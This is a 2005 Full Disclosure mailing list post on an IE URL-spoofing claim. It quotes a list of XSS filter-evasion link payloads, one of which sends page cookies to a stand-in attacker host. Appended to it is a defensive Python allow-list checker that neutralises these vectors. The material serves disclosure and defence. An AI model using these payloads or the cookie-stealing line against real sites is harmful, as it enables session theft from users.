
fulldisclosure logo Full Disclosure mailing list archives

Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen).
From: Justin Allen <jallen () logicaldevelopments com au>
Date: Fri, 21 Oct 2005 09:08:43 +0800

Did you even test those URLs? The only thing that happens is a message
box pops up; the status bar text also states that a message box will pop
up. The only thing it does is change the tooltip on the link to google.com.

-- 
Justin Allen
Software Developer
Logical Developments
Phone: +61 8 9458 3889



Jerome Athias wrote:

You can then mix it with some classical XSS tricks like

Basic XSS test detected:

<a href="javascript:alert('XSS')" title="http://www.google.com">hello0</a>
<a
href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?'
+document.cookies</script>">Click here</a>


Basic XSS test :

<a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com">hello0</a>

UTF-8:

<a
href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41"
title="http://www.google.com">hello</a>

Long UTF-8 Unicode encoding without semicolons:

<a
href=       &#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041
title="http://www.google.com"
onMouseOver="pop('http://www.google.com');" onmouseout="kill()">hello</a>

Embedded newline to break up XSS:

<a href=jav&#x0A;ascript:alert('XSS'); title="http://www.google.com"
hover="http://www.google.com">hello2</a>

Embedded carriage return to break up XSS (doesn't appear as link):

<a href=jav&#x0D;ascript:alert('XSS'); title="http://www.google.com"
onmouseover="image(this.href);">hello3</a>

Inserting spaces in href link:

<a href=" javascript:alert('XSS');" title="http://www.google.com">hello4</a>


etc...

some bypass the Opera anti-illegal-urls

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
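The vectors quoted above all aim at one weakness: a filter that looks for the literal string "javascript:" before the browser's own parser has decoded character references, dropped embedded tab/LF/CR and trimmed leading whitespace. The following is an added example, not code from either poster, of an href allow-list check that normalises the value the same way a URL parser does before looking at the scheme. The attribute values in VECTORS are reconstructed from the quoted message (the values only, with the surrounding tags stripped); SAMPLE_FRAGMENT, the allow-list contents and all function names are this example's own choices.

```python
"""Scheme allow-list check for href values. The value is normalised the way a
browser's URL parser normalises it, so the obfuscated javascript: forms quoted
in the thread collapse to the same scheme before the check runs.

Added example, not code from the original post. VECTORS is reconstructed from
the quoted message (attribute values only); SAMPLE_FRAGMENT is constructed.
"""
import html
import re
from html.parser import HTMLParser

# The URL standard strips leading/trailing C0 controls and space, then removes
# ASCII tab, LF and CR anywhere in the input before parsing the scheme.
_LEAD_TRAIL_WS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_TAB_NL_CR = re.compile(r"[\t\n\r]")
# scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) followed by ":"
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")

SAFE_SCHEMES = {"http", "https", "mailto"}  # allow-list; everything else is rejected


def normalize_href(raw: str) -> str:
    """Decode character references, then apply the URL parser's whitespace rules."""
    value = html.unescape(raw)  # decodes &#106; as well as &#0000106 (no semicolon) and &#x0A;
    value = _LEAD_TRAIL_WS.sub("", value)  # " javascript:..." -> "javascript:..."
    value = _TAB_NL_CR.sub("", value)  # "jav\nascript:" -> "javascript:"
    return value


def href_scheme(raw: str):
    """Lower-cased scheme of the normalised href, or None for a relative URL."""
    m = _SCHEME.match(normalize_href(raw))
    return m.group(1).lower() if m else None


def is_safe_href(raw: str) -> bool:
    """True for relative URLs and allow-listed schemes; False for anything else."""
    scheme = href_scheme(raw)
    return scheme is None or scheme in SAFE_SCHEMES


class _HrefCollector(HTMLParser):
    """Collects href values of <a> tags; HTMLParser decodes entities in attributes itself."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value is not None:
                    self.hrefs.append(value)


def unsafe_hrefs(fragment: str) -> list:
    """Normalised href values in an HTML fragment whose scheme fails the allow-list."""
    collector = _HrefCollector()
    collector.feed(fragment)
    return [normalize_href(h) for h in collector.hrefs if not is_safe_href(h)]


# Attribute values reconstructed from the quoted message, plus two constructed safe ones.
VECTORS = {
    "plain": "javascript:alert('XSS')",
    "mixed_case": "JaVaScRiPt:alert('XSS')",
    "decimal_refs": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;"
                    "&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41",
    "long_refs_no_semicolon": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
                              "&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097"
                              "&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039"
                              "&#0000088&#0000083&#0000083&#0000039&#0000041",
    "embedded_newline": "jav&#x0A;ascript:alert('XSS');",
    "embedded_cr": "jav&#x0D;ascript:alert('XSS');",
    "leading_space": " javascript:alert('XSS');",
    "http": "http://www.google.com",
    "relative": "/search?q=hello",
}

# Constructed fragment: two of the quoted anchors and one harmless link.
SAMPLE_FRAGMENT = (
    '<a href="javascript:alert(\'XSS\')" title="http://www.google.com">hello0</a>\n'
    '<a href=jav&#x0A;ascript:alert(\'XSS\'); title="http://www.google.com">hello2</a>\n'
    '<a href="http://www.google.com">ok</a>\n'
)

if __name__ == "__main__":
    for name, value in VECTORS.items():
        print(f"{name:24s} scheme={href_scheme(value)!s:12s} safe={is_safe_href(value)}")
    print("unsafe in fragment:", unsafe_hrefs(SAMPLE_FRAGMENT))
```

The check is an allow-list on the scheme rather than a search for "javascript", which is why case, numeric references with or without semicolons, embedded line breaks and leading spaces make no difference: every quoted vector normalises to the same "javascript" scheme and is rejected, while plain http links and relative paths pass.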

